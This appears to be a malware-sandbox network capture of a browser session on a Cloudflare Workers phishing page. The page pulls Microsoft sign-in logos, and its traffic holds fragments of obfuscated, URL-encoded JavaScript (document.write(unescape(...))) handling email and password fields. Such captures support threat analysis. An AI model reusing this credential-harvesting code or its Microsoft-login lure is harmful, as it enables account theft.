30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 65 Data Ascii: 8%27.mail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%28%27.ne
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 25 32 30 70 77 64 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 Data Ascii: %20pwd.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%20%20%20
2024-04-28 23:11:39 UTC	360	IN	Data Raw: 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 Data Ascii: 20%20%20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49756	104.21.235.181	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:39 UTC	641	OUT	GET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1 Host: www.linkpicture.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:40 UTC	634	IN	HTTP/1.1 404 Not Found Date: Sun, 28 Apr 2024 23:11:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close vary: Accept-Encoding x-turbo-charged-by: LiteSpeed Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 398395 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OgVX3jyPtvECmYZZTxn4CexlmRXxr9CIxEf1euhWvT9YFjfmC8EvOhJKMNxQ0HCVLxPZFe4L63mudhqivV6vRFcH8sxmxW1f8t9QxiG%2Bhl8t1Gx%2BU%2Fg2h679TnbyhtSzDEMpysiH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babb93bc298105-ORD
2024-04-28 23:11:40 UTC	735	IN	Data Raw: 32 36 35 66 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d Data Ascii: 265f<!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"><meta http-equiv="Cache-control" content="no-cache"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Expires" content="0"><meta nam
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a Data Ascii: } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 Data Ascii: text-align: center; } .additional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left;
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left;
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 41 61 4d 2b 79 51 75 6e 42 6d 4e 53 77 62 52 56 59 68 2b 6b 4f 63 67 4d 68 76 52 44 42 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 Data Ascii: tqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f 6e 5a 7a 78 44 71 6d 71 46 52 46 43 37 39 39 2b 64 62 45 69 72 4d 6f 56 45 58 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 56 30 52 49 71 2f 36 2b 42 49 50 50 56 56 4c 72 Data Ascii: STKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLr
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 63 74 52 44 43 31 46 73 47 61 51 33 52 74 47 46 66 4c 34 6f 73 33 34 67 36 54 2b 41 6b 41 54 38 34 62 73 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77 50 59 66 4e 38 70 5a 42 63 30 67 2b 4a 4b 69 4b 59 69 4e 72 39 72 34 76 31 5a 72 76 64 62 74 61 7a 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 54 74 39 47 51 41 36 68 2b 64 2f 31 64 45 35 41 6e 39 47 52 48 35 6f 35 6d 77 49 67 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 Data Ascii: ctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+E
2024-04-28 23:11:40 UTC	882	IN	Data Raw: 2f 73 65 63 74 69 6f 6e 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 22 20 Data Ascii: /section><p class="reason-text">The server cannot find the requested page:</p></div><section class="additional-info"><div class="container"><div class="additional-info-items"><ul><li><img src="/img-sys/server_misconfigured.png" class="info-image"
2024-04-28 23:11:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	13.107.246.51	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:39 UTC	673	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:40 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:40 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT ETag: 0x8D79B8373CB2849 x-ms-request-id: d73a97a8-101e-0007-4cb6-983490000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240428T231140Z-17f6c5785f4qq7szstpc5vn17w00000003u0000000004cr9 x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-28 23:11:40 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	13.107.246.51	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:39 UTC	673	OUT	GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:40 UTC	779	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:40 GMT Content-Type: image/svg+xml Content-Length: 621 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT ETag: 0x8D8852A7FA6B761 x-ms-request-id: 4b68c6e3-101e-006f-64c1-992ea3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240428T231140Z-17f6c5785f4tb7rg643p9d72040000000a1g000000000stq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-28 23:11:40 UTC	621	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8 Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=\|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49758	35.190.80.1	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:40 UTC	542	OUT	OPTIONS /report/v4?s=OgVX3jyPtvECmYZZTxn4CexlmRXxr9CIxEf1euhWvT9YFjfmC8EvOhJKMNxQ0HCVLxPZFe4L63mudhqivV6vRFcH8sxmxW1f8t9QxiG%2Bhl8t1Gx%2BU%2Fg2h679TnbyhtSzDEMpysiH HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://www.linkpicture.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:40 UTC	336	IN	HTTP/1.1 200 OK content-length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Sun, 28 Apr 2024 23:11:40 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49761	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:40 UTC	626	OUT	GET /favicon.ico HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:40 UTC	573	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:40 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oa1MAF7PngvWlXnXjuqidJ9gax0%2BF8fh05hMTq%2FIySIE1JFi4UzqtrchRTlXLp2u7fF4JwWdMxvqYfspVf1GVRm4ONIlCSL7cWuvPeejBWFNs72fX2mBlsLG0kfRDCzLw%2B7GFiBDQT5IoYVw7qK4Ruj%2BlmM6WQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babb983f5d02b8-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:40 UTC	796	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 65 72 2d 62 6f 74 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 Data Ascii: 